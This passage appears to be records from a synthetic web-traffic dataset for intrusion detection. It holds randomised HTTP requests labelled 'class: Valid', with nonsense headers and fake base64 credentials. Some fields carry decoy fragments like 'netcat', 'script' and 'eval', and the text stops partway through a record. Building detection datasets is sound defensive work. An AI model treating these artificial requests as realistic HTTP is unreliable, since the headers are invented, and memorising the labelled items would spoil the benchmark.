Referer: http://eaow4m.st/sUkn/Fqsmos4/ehaa/5Ci4lt.jpg
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.7 (Windows; U; WinNT 9.6; gr-vg; rv:2.6.8) Gecko/24930167
UA-CPU: x86
UA-Disp: 8723,427,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: 0.3 www.h9Itpo.shtml, FTP/6.1 124.73.49.41, 2.2 www.q0en.html
Transfer-Encoding: hjujn; hEuns=eiel
Upgrade: tj7me/7.3, tfnrrh/8.7, dbgr/9.1, Sst/7.4
Warning: 832 www.elmhq.gif "hNotnsoel4" "Wed, 29 Jun 05 13:21:52 UTC"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15405
Start - Id: 7883
class: Valid
PUT /OtsdeldEse6eaceo/kN2EO/FDegENopt/0eaNnlnphhmzin9/nedrl5d8sws/a8QZ4WN/hlPOyQqV2l/y_cZO.asmx? HTTP/1.0
Content-Length: 6
Content-Language: oh,kryei
Content-Encoding: deflate
Content-Location: http://sadeIood.gov/foeodb/nuna.tiff
Content-MD5: YXN0bnMxZWQ0cm9qbm90eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 12:32:12 UTC
Last-Modified: Tue, 12 Jul 05 20:37:19 GMT
Host: www.iWw5.fr
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-9;q=0.3, x-mac-roman;q=0.2, windows-1251;q=0.7, iso-2022-kr;q=0.8, iso-8859-8-i;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 217.1.10.243
Cookie: kMYp=aCyN-BNJ;tlhip6al8hnyslt=po;decric9monoOv=e su9;mioksdecxo=7395288;childE9lLxml7=0124050
Cookie2: $Version="921"
Date: Wed, 24 Sep 08 12:07:50 CET
ETag: "bnz4bYpevqr5Fkz"
Expect: maalns
From: aeb9sc@newen.be
If-Modified-Since: Mon, 11 Feb 08 04:53:32 CET
If-Unmodified-Since: Tue, 10 Feb 09 02:25:48 GMT
If-Match: "pqrHPf@Gj.1OsfO"
If-None-Match: *
If-Range: "Hzyj-9EYKxEkuyL-_w."
Max-Forwards: 169
MIME-Version: 0.4
Pragma: h=7i
Proxy-Authorization: Basic c2JjYnQ6N3NscHRpcA==
Authorization: Digest nonce
Range: -990932,7-807
Referer: /ertS8i/szo5g/nrtt/aAeiMl/dfnitac.gz
TE: chunked;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/7.3 (compatible; oEsh; Solaris; qerboDaua6)
UA-CPU: Sparc
UA-Disp: 9422,2675,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 027x4135
Via: 0.4 www.eetoi.jpg, 7.7 www.eo4ner.png:0
Transfer-Encoding: tNrs; tt4r=9zY7oli
Upgrade: zo0jhs/9.3, IJs3au/5.6, dAmeer/2.8
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 176.35.134.95
X-Serial-Number: 77243
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe=nzp

End - Id: 7883
Start - Id: 32035
class: Valid
GET /lWC/rs9eu4unde/dOSOHs963dy1EXYWn7/uehautr6itilnosl/mrtl0sgl5/LKi/fGcNSHAewq6LW9.jpg?Io7update.Z9UoX=88461&ckhnrfooewM=48&Kk6AlI.=313304779&mu3efopueee=sEi1iOh2utH&diiahNasOaeit=psstdin&nstritiuD9nofbt=xe%3B HTTP/1.1
Host: 250.9.242.207
Connection: e0y1SQ1
Accept: image/*
Accept-Charset: x-mac-arabic, windows-1257, x-mac-arabic;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=321
Client-ip: 212.189.3.187
Cookie: ion=linktA6;8Hcsost0=i5nMP;znYJK=execl
Cookie2: $Version="66"
Date: Tue, 15 Mar 05 23:20:18 UTC
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: hMpeNchu@otttmeoI6.st
If-Modified-Since: Fri, 21 Dec 07 19:05:14 CET
If-Unmodified-Since: Sun, 16 Nov 08 20:03:58 CET
If-Match: "AQKoDgGhIPo7O.rVW@m"
If-None-Match: "K24rSh3B@-q1-CVF.zLI"
If-Range: Sun, 12 Jul 09 11:50:24 GMT
Max-Forwards: 187
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic dHNodzpzZWt5dDdy
Range: 23518-
Referer: http://www.u2pai.fr/cbteNpa/Teztahi/ceqlSa/raiweOe.msf
TE: chunked,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 7.6; oe-WS; rv:8.3.0) Gecko/57273092
UA-CPU: x86
UA-Disp: 018,804,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8661x2250
Via: rs0dd/8.3 88.72.242.195, clsu/1.9 www.ai0tatU.jpeg
Transfer-Encoding: identity
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32035
Start - Id: 2648
class: Valid
GET /QX/@UmO.jpeg?6ECmBi7h=205682&inndiTWPi=18246&dcatenevrs=%3Da+atl8tdodaguss%26%40%3F0&laaoe1arp=v0d%3Ct&dlnpyoStJ=ao+aa&isa=7739&eacfaopsmn=d2uTkVKH08lh&cSULbe=as9EYGAHL&eweEo8f=ahnntotldf%2B%24h HTTP/1.1
Host: 232.49.93.87
Connection: close
Accept: application/*
Accept-Charset: x-mac-roman;q=0.0, iso-8859-6, x-mac-japanese
Accept-Encoding: gzip;q=0.1, deflate, identity;q=0.9, identity, deflate;q=0.6
Accept-Language: ndXyDwrk-lm;q=0.7, o-o, ie8enl-st
Cache-Control: only-if-cached
Client-ip: 183.26.217.193
Cookie: Sulgeaesr=719791;doaoA=l8letallr  1(;J-KuzDW@=369590
Cookie2: $Version="599"
Date: Sun, 14 Feb 10 04:43:19 CET
ETag: "b9-aq5IVCQ3wlVKWtmzi"
Expect: 100-continue
From: Oomte@vcrEi.de
If-Modified-Since: Wed, 26 May 04 04:26:27 CET
If-Unmodified-Since: Sat, 09 Oct 04 10:02:32 GMT
If-Match: *
If-None-Match: "v15-HACvWWkep_fHB"
If-Range: "r1@vx.IchxYcCS9CE"
Max-Forwards: 0
MIME-Version: 6.0
Pragma: mS=nssw
Proxy-Authorization: websse omiolh=ayio
Authorization: Digest nonce
Range: 78017-732
Referer: /ndaen/lnt6H/ejauPk/MaHoo.msf
TE: trailers
Trailer: Accept-Charset
User-Agent: kirr8Ssr8aSinna9c
UA-CPU: MIPS
UA-Disp: 474,638,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 554x785
Via: 4.3 219.137.140.90, FTP/9.5 www.zmRes.css, 6.2 196.176.20.164
Transfer-Encoding: v7Otah; yoeoeep=gaeh
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 065 www.uits5r.png:03 "d0hLuSoewoA4" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2648
Start - Id: 14322
class: Valid
GET /FcwSnetcatq/hnorcS3uriAlsuyau/6_A1@v/iK94k12we2urQeAsdk/ntvTjqq9FAH/yayE4XRP@j1/LoewhtsdfowwtEeqeeN/dTsyTfeKeDXV.vQ/h8aqUQOOkxTr3/xoejCpUSP8fAajhS/9@39jsiXz/rJvnFcR.jpeg?lsao=qeze&se=rSxFzu9&pei0S=e%2BBt%3D%25iscriptf%28le9eSvara&k1touolhmpi=07772&r3=m&WmoP=nat&zzz4=9edscripteStgaalr%3Fuieselt&pKc0nuEAnode=Beoehbt&ewia=5793&ceeeiNi=nodef8aOrnpNa7Sen&nne5ssmshauh5eq=t1zxpVe2N&to=%3B0eftptm&pVxmlo1httpBwhereEr4x=gfepio&rhq8ks8op3airw=9ixhgqyz&stg6ocnuHsx=lic%7EJE+fOnull%5Cxt HTTP/1.0
Host: 233.166.207.96
Connection: adttkeI
Accept: audio/*, text/plain;q=0.3
Accept-Charset: x-mac-hebrew, x-mac-arabic, iso-8859-1;q=0.7, iso-8859-8-i;q=0.9
Accept-Encoding: deflate, gzip, identity, compress, deflate;q=0.0
Accept-Language: t1c-smr2h9, ew-s37lapei
Cache-Control: max-age=0545
Client-ip: 151.197.187.168
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="72"
Date: Sat, 13 Mar 04 13:25:11 UTC
ETag: W/"1zgH6mU-ZNLYGM7.s"
Expect: 100-continue
From: jtmptc@yareToaz.de
If-Modified-Since: Tue, 13 Sep 05 14:28:14 GMT
If-Unmodified-Since: Sat, 12 Feb 05 20:12:58 GMT
If-Match: *
If-None-Match: "0-nfzn2bnW4DsmaTi6e"
If-Range: "ATLcsapt-3yojWslI4"
Max-Forwards: 3
MIME-Version: 1.6
Pragma: rui='dtvkpEte'
Proxy-Authorization: NTLM M2F0cnQxOWhsaGVvb2ppYW4xd25JbGVubWZ1c0luZXhUNGxveXFpZHI5c29wdTY=
Authorization: Basic b25kdDBHbjprczk4
Range: 44-41,-8,-787777
Referer: /nsar/sana/AIftldH/hasopaz.dll
TE: trailers
Trailer: From
User-Agent: agstte (i7eF3RfgW; h-P456Y33; t@Vpmq; tkETO0I)
UA-CPU: MIPS
UA-Disp: 8829,2171,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: 6.2 www.slweAa.html, 8.4 www.EVlre.js, FTP/3.4 16.101.91.90
Transfer-Encoding: deflate
Upgrade: 9sii2/1.4
Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 130.188.8.33
X-Serial-Number: 04884664
----: -----------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 14322
Start - Id: 34669
class: Valid
POST /wFyLV/iy-5ceY87fVhLGxJ99V/is/mn4elelcrul7lnc/mHMAbMgSZO3x/eq/jue/abet/eTwb8aee.jpg? HTTP/1.0
Content-Length: 183
Content-Language: gtrmee,esincYe
Content-Encoding: gzip
Content-Location: /ahrhEom.cfm
Content-MD5: c3JoM29ldjRuM2NlV2ljMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jan 04 23:51:19 GMT
Last-Modified: Sun, 02 Jan 05 21:04:36 UTC
Host: 28.201.17.7
Connection: close
Accept: image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: max-age=168
Client-ip: 120.36.171.34
Cookie: enar=7217628;herlshvsnr=yntde
Cookie2: $Version="8"
Date: Sun, 04 Jan 04 05:58:30 UTC
ETag: "p4qYJhv8vIwEdsiuRA"
Expect: tTsresbs
From: wngue@XEre.cz
If-Modified-Since: Thu, 09 Jun 05 17:20:15 UTC
If-Unmodified-Since: Mon, 21 Nov 05 20:00:22 CET
If-Match: *
If-None-Match: "4lZKWkH84t@.QThj2qJ_"
If-Range: Fri, 01 Dec 06 16:01:19 CET
Max-Forwards: 58
MIME-Version: 0.5
Pragma: an='uj9o'
Proxy-Authorization: Digest algorithm=vehg
Authorization: NTLM bjVkeGhhYWFsaWdhc0NkZXRybnRlNXVpQTJhbVRpc3RhMWpyTm5jaXRy
Range: -08
Referer: /3ehrthaa/nsrua.mp3
TE: trailers,trailers
Trailer: Connection
User-Agent: hetmojNssnengyvg
UA-CPU: PowerPC
UA-Disp: 888,756,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0894x8053
Via: 7.7 60.230.63.110:6, HTTP/7.3 www.TSjlTisu.tiff
Transfer-Encoding: identity
Upgrade: Pxo/5.2, ieHso/7.8
Warning: 912 www.vEtlJzei.png "hmbt4d6C" "Tue, 20 Sep 05 24:39:51 GMT"
X-Forwarded-For: 180.150.65.176
X-Serial-Number: 80315
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

8v5r7Me=390&isJpu.VL=vUyU_nL3O&Hhioau=rGxVse7MMM&diincludeXcucatfG=rcph&iROGayeurgcfsx=8640635&nR1EsFe=sqauffnSwEif&snkt=odIB&1hlu8=ta<%5&cssei=httpsazqs&ilfltuef=5&wb1uotunc=9699

End - Id: 34669
Start - Id: 27184
class: Valid
GET /sI5i06r3eorhnpfatIn/etnkpeoo/eQntoB0vP1/jtchNawuxapmNOrdE/r5/i5darmtttac0hrnE/jaCGLT1JRYhNnmFjh0/urit/bXX/uchlatiepuf/weietltduxsece/tnoinaEEtflr.aspx?rKs=23498607&slosvlefbza=ir%28ed&hVep8eSepicbs=7&likehconnect8=226853&Lsock_stream9HA=iEehTgeccsma1ps1e&enool=cEgZZuE5ac&teedtq2nsYoieav=4&eUo=uh+wL&mRao=828&1linnU=6153 HTTP/1.0
Host: www.osuiM6No.be
Connection: keep-alive
Accept: application/*;q=0.9, image/*, text/plain;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: ii-acs
Cache-Control: no-transform
Client-ip: 30.130.235.21
Cookie: hl=331;c4ye=tl]rknform
Cookie2: $Version="3"
Date: Wed, 25 Jun 08 20:08:03 CET
ETag: "v6laF5Qbp0MAbwY2Um"
Expect: 100-continue
From: tnEr3ec@tnrtge.com
If-Modified-Since: Fri, 19 Sep 08 15:16:55 CET
If-Unmodified-Since: Thu, 20 Oct 05 23:45:03 CET
If-Match: "R5aK9-3v17o.tpHI"
If-None-Match: "-KcepOJ7@Ydg-5DImM"
If-Range: *
Max-Forwards: 4973
MIME-Version: 2.5
Pragma: ner=sh97kt
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Digest cnonce="ahdw3rls"
Range: -89,0751-3,3143-291
Referer: http://www.riplri.de/s9oti/tra6tnag/egi3t.jsp
TE: trailers,chunked;q=0.0,trailers
Trailer: Connection
User-Agent: Mozilla/6.3 (Windows; U; Windows NT 3.8; ie-ye; rv:9.4.3) Gecko/78077879
UA-CPU: MIPS
UA-Disp: 451,9242,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3319x950
Via: 2.6 232.127.87.172, 0.6 26.179.115.189
Transfer-Encoding: identity
Upgrade: Etiah/8.1, hsg/1.5
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 437437535
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27184
Start - Id: 32729
class: Valid
PUT /esg4TO/boes/dxfeiql/t2meNi-JzBEdXXxu/Jblib2U/if7lheeoraRekfdgu/6tPBWUV1v/7ne4rEyhkhbrsdfncqm/seC8hlalrTk79i9iiJ/Fdive.js? HTTP/1.1
Content-Length: 62
Content-Language: fcbr0,eVpeor
Content-Encoding: deflate
Content-Location: http://Htwe.st/sahe/eeuex/iintOPmw/soboWth.mpg
Content-MD5: ZmVpeWFld3JoeVRlcjNkdw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Jun 07 10:01:00 GMT
Last-Modified: Sun, 19 Sep 04 12:32:30 UTC
Host: www.y717cht.uk
Connection: keep-alive
Accept: audio/*, audio/basic
Accept-Charset: iso-8859-1;q=0.9, windows-1257;q=0.2, x-mac-korean;q=0.2, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.216.102.1
Cookie: 7cnDr26=httpo9
Cookie2: $Version="3"
Date: Sun, 29 Jun 08 22:21:26 GMT
ETag: "P4rYQxRGmRWfYPzbnT"
Expect: inEtim
From: eaop5a@jraia3l.uk
If-Modified-Since: Fri, 09 Jul 04 16:01:40 UTC
If-Unmodified-Since: Sun, 29 Nov 09 13:44:36 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6300
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM bTR0ZWlyMnBpYW15ZXR0NWxlcGFoM2VpdDZzYTR1YWlyRXJvc25uaXQ=
Authorization: Digest uri=http://www.eiiesntf.net/9genFto/dteE.php4
Range: 90783-,-4
Referer: /oeo0I0y.sh
TE: trailers
Trailer: Max-Forwards
User-Agent: vcihtess
UA-CPU: Sparc
UA-Disp: 9205,1280,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1032x4856
Via: 2.7 www.ljm4.shtml, 2.4 17.87.229.111, hHflr/2.3 71.96.249.160
Transfer-Encoding: deflate
Upgrade: Ontms/2.9, ocVpad/2.0, t7o/2.5
Warning: 971 www.nreie.html:86955 "sootstDgebnbLaecv" 
X-Forwarded-For: 154.7.116.173
X-Serial-Number: 16114956793159
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XbodyVHconnect=een&rDTr1e5dma=hhPhuK&3r7gateHe=aoerr19ssrynara

End - Id: 32729
Start - Id: 30455
class: Valid
GET /timgJwhere/rtcq7Dn/pbaPa.W-zw-jQZmw/et6MmJB_mtWP.jpg?rreuoe=dSf&aao=uMqy5OQvVE&o5duNhgeyoesta=9872540&Lnt4zn=m7i-t+%7Cf&um8uSy6imc=qdwssersd&nertaeuao=609516&xskttiipTo=710&_HnUm6position3NH=do70hna&bier=04110119&fams8sal4uj=Oneahjxd-lmuj&dSasdmeyUtt=hr20ocyJis&UowjsiBem=sbE.vK1D%40&ag=8363764&smiaeaf=noB&olnswilb9cyeo=selgnMvonA HTTP/1.0
Host: 178.164.188.193
Connection: nmthmhw
Accept: image/*;q=0.4, application/*, video/*;q=0.4
Accept-Charset: iso-8859-8-i;q=0.3, euc-cn, x-mac-icelandic
Accept-Encoding: compress;q=0.7, deflate;q=0.1, identity;q=0.3, deflate
Accept-Language: 6i3lqj-sm;q=0.7
Cache-Control: max-stale
Client-ip: 80.126.139.199
Cookie: o2Gpaynl=0718;thwT=gnoS
Cookie2: $Version="15"
Date: Mon, 05 Jan 09 02:46:23 GMT
ETag: W/"QSvv_aENQkN6@DI"
Expect: ow6wn
From: etwe@4benog9e.it
If-Modified-Since: Sat, 21 Jun 08 15:02:32 UTC
If-Unmodified-Since: Sun, 24 Oct 04 13:40:11 CET
If-Match: "hSMlgoptQD09_9U"
If-None-Match: "EgInLqHnK8SmBdAQS"
If-Range: Sun, 29 Mar 09 08:10:14 UTC
Max-Forwards: 61
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic b2NweDlxOnN0dDFpcmV0
Authorization: NTLM bmViczF6ZU5ucm55YnRheGJvdW9wb200bGl1dWQ5dHRhc3hndW51SGVhaA==
Range: 9-01848
Referer: http://www.is7tacni.gov/zaahe/ruel.pl
TE: gzip;q=0.1
Trailer: Cache-Control
User-Agent: t07hsaj/5.3.5.8
UA-CPU: PowerPC
UA-Disp: 2897,898,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 710x3564
Via: 4.0 163.180.108.157, 8.5 171.170.130.89
Transfer-Encoding: identity
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 372 6.28.172.137 "NiolntT" "Sat, 08 Mar 08 01:32:29 UTC"
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 839589841918771
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30455
Start - Id: 25058
class: Valid
GET /ii/sOu/s72swHQ/cgiQQRx-R9B9s204y@H/tkMBlddNJ_q8/fS3YMDdrTm2_W8w/rimicereeat8tr/fYAZLXAotnAT5/cras/eIHiXckIVB-1a3je/FwhereoL.gif?eax9e=476775&n7asgy=0&v0n-c=M+&eeohcwnynaki=unHtDe&6c4ywf=Aw4i&hn4keezrbHukoRd=4560&agli8=68417&itizu7aczgsidm=d&so6=6626433&tsrxslneeae=a_-4 HTTP/1.1
Host: 53.39.69.198
Connection: aunse
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-japanese, gb2312, x-mac-greek, iso-8859-3;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: w-tewfOs, s-iib
Cache-Control: max-age=34689
Client-ip: 62.204.47.211
Cookie: oweff=Teigopeni;6msfwh5nnesiueu=1820;taEo=p8tnoaoecicfestaey;teYhiunopoijc=NeIlo2t;8aTue=sltta;mTrze=15463720
Cookie2: $Version="3"
Date: Wed, 14 Jul 04 24:49:32 CET
ETag: "u248aUIf2HSJiI17"
Expect: 100-continue
From: Nett@Mbgoe.fr
If-Modified-Since: Wed, 14 Dec 05 07:28:21 CET
If-Unmodified-Since: Thu, 27 Mar 08 20:46:49 GMT
If-Match: *
If-None-Match: *
If-Range: "fqteEzCFyqs5PR0"
Max-Forwards: 4596
MIME-Version: 0.1
Pragma: l=s
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: 0psH u6alrd=yaeier
Range: 978-9166
Referer: /wtctt/eNLo2.mdb
TE: chunked;q=0.5,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 3.6; tc-aa; rv:3.1.8) Gecko/69654994
UA-CPU: StrongARM
UA-Disp: 0739,480,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6866x078
Via: HTTP/9.5 84.117.46.127, 9.8 28.29.27.28
Transfer-Encoding: eslon
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 839 213.112.236.134:597 "Greakdulim" "Wed, 11 Mar 09 08:51:34 UTC"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25058
Start - Id: 30318
class: Valid
GET /lbAxLKyKP/MIh8nsv2presharnzw/aAiVQPI1/Eohie7tb8sb/t9VUWb/mmOasotmenr0tit/qOsqat9et8nis/t7G7kkNb/boQ/nG2ghtNaDqwfI9HqLqdf/ebnlvtr.jsp?ZbdXn3AQQ=doeid+e&gen=Gt&9esG=23042280&kba=zgj30jsqEUsbSh&nztS9rf=yciEl+vmailgroup+by7o&KNtC=%29s+ilstylec95oz%2BhI0&twsephtmslolscn=nn1eO+1TfdivAt&nt1fo=ayepsyx3jlatxa&sa=e5siptts&snU7r5t=bgsound169nsr&rEs15io4bah=%5Dg&iMtk9a=wi&rMv6oeasriko=4868412&t8irht=75688&se8gioneatrEko=bcslUTeafhentcnr HTTP/1.1
Host: 35.159.184.38
Connection: keep-alive
Accept: image/gif, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: a-itw;q=0.3, O-usoieaT;q=0.7, tnbndks-hn07alao;q=0.6, tetwei7t-jo3E6
Cache-Control: max-stale=14539
Client-ip: 158.8.64.9
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="1"
Date: Fri, 19 Jan 07 01:46:27 GMT
ETag: W/"xliPt_ly5_0Z-ER.-rRb"
Expect: 100-continue
From: eredri@rnloehihom.net
If-Modified-Since: Wed, 26 Oct 05 14:46:23 GMT
If-Unmodified-Since: Thu, 03 Sep 09 11:27:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXJ0SWN5YjU6aFRuNHRu
Authorization: NTLM ZXRpdHRhY2VuZWlnb2FTZHJlMmNvZWRTYWtpZWx2cm9hZGxtaTEydGI=
Range: 54-167889
Referer: http://HutsAlth.ch/hdils.jpeg
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: 9AmOIR. http://www.shete.com
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3971x442
Via: 9.4 www.benIrfo.css, 1.9 24.158.30.66
Transfer-Encoding: netl
Upgrade: iure/4.9
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30318
Start - Id: 29093
class: Valid
GET /kpsls.7J-b.nsf?ebteseaoonan=%3C9t&Rwrnsbyieee=netcx9servicesscdarp&ruwtiiaH4e=rz-I5N5S&Aectaroagx5nil=9842081&am8zrdvded6=eG8kbjF6&ha1xnst3Cr=bwmeqk&eml=itd&wCik=3019&oo7plkie1nrsuru=rU0al&iaei5adn6q4=positionOohr&ese1roshdd=1160600820 HTTP/1.1
Host: 59.151.138.158
Connection: Suote
Accept: text/*;q=0.3, text/xml
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: n-e8rrtbt, yzayrleo-ems;q=0.1, 5ls-sa;q=0.6, p-stz, ddeon-t2r
Cache-Control: eRehie=6o7o5
Client-ip: 62.61.118.78
Cookie: inewektsfhoc=kswoTt;eihaaz=48999;M0QAPz-fZuv8=tg
Cookie2: $Version="661"
Date: Tue, 24 Jun 08 09:23:00 UTC
ETag: "ZRSDHtKpcZmCV4Nn"
Expect: 100-continue
From: nbrdn3@nn5EreeeAS.fr
If-Modified-Since: Mon, 08 Sep 08 18:11:46 UTC
If-Unmodified-Since: Thu, 08 Dec 05 21:03:23 UTC
If-Match: "iCYDb8jFh2MDjkB"
If-None-Match: "clZxjtdYa4vIpvoLL"
If-Range: Wed, 07 Apr 04 08:01:33 CET
Max-Forwards: 5520
MIME-Version: 8.2
Pragma: 3oet=cf8oi
Proxy-Authorization: NTLM YWVoSWxwRXRqNm54ZWd0aTJkeG9vYm5ybjllc3VzdGJkck9xYXdxb1Rldw==
Authorization: Digest uri=http://eeuh.st/euseere/81nuAe/1oaW/T4sessoL/etipi.cgi
Range: -5612
Referer: http://www.eetamh.be/htyIsz/diratoe/naa5mdrd/6lndh.mspx
TE: trailers
Trailer: Date
User-Agent: ofYzmX http://www.iyhomtS.fr
UA-CPU: PowerPC
UA-Disp: 352,591,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7767x3879
Via: FTP/3.3 www.naZeD.jpeg, 0.4 www.weihcsi.jpg
Transfer-Encoding: deflate
Upgrade: teav/2.5, xneK/0.8, ecrUt/0.0, a8tr/4.9
Warning: 320 www.eroso.png:40 "mOorarxnsr82arTiS" 
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29093
Start - Id: 22078
class: Valid
GET /iAE-/vh0T2M1JQ2DYYBs/ohfPggV-D.1cqL/to8hrbstuefvHwa4yd8e/FA77.js?ghCs=sfene8vhthe HTTP/1.0
Host: 98.196.110.140
Connection: close
Accept: */*;q=0.6
Accept-Charset: us-ascii
Accept-Encoding: deflate, gzip;q=0.2, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 206.228.155.203
Cookie: vepbp=0e;kYl0aXk.t6=hrtelehddsnniiaoi;oop=0704172642;aehfEsEg=tdS
Cookie2: $Version="55"
Date: Fri, 12 Oct 07 24:19:59 GMT
ETag: "fa7JOEjRi4nToad9o"
Expect: 100-continue
From: kdhjpy@6iewo7.st
If-Modified-Since: Fri, 07 Apr 06 16:58:06 GMT
If-Unmodified-Since: Sat, 30 Sep 06 10:04:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM b2VMemlwc2hIMndzdGM1dGRlZWFIMTV1ZG85OGxlZm9yaQ==
Authorization: elaetb oerc=Gtis
Range: -774
Referer: /kcek.mdb
TE: trailers,gzip
Trailer: Upgrade
User-Agent: 77raOad1/5.8.4
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: HTTP/0.6 63.106.76.105:65
Transfer-Encoding: compress
Upgrade: shM/8.0, cpaadn/3.4
Warning: 721 www.eaGi.html "UawfosanHHaojndn" "Wed, 01 Nov 06 18:16:15 GMT"
X-Forwarded-For: 26.127.5.71
X-Serial-Number: 42920569636252963929
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22078
Start - Id: 16825
class: Valid
GET /tmfN0/VQSyw1n/i5adHtexxfIyst8u.jpg? HTTP/1.1
Host: 201.220.9.172
Connection: FdvaoaS
Accept: image/jpeg;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress, identity;q=0.3, identity
Accept-Language: m-ptfte, do-lrMrbt, rch-yt8
Cache-Control: no-store
Client-ip: 6.186.207.70
Cookie: VstdinYW=8559;etdishvattht=xnU5a-G18;T02KOIrV=E46taa;lrciOdntpe2ea=0083357
Cookie2: $Version="84"
Date: Sun, 06 Jul 08 18:23:31 UTC
ETag: "itjXOwKf@iA@iiML87g"
Expect: 100-continue
From: eoPu@ohbrao.biz
If-Modified-Since: Sun, 21 Mar 04 06:58:17 CET
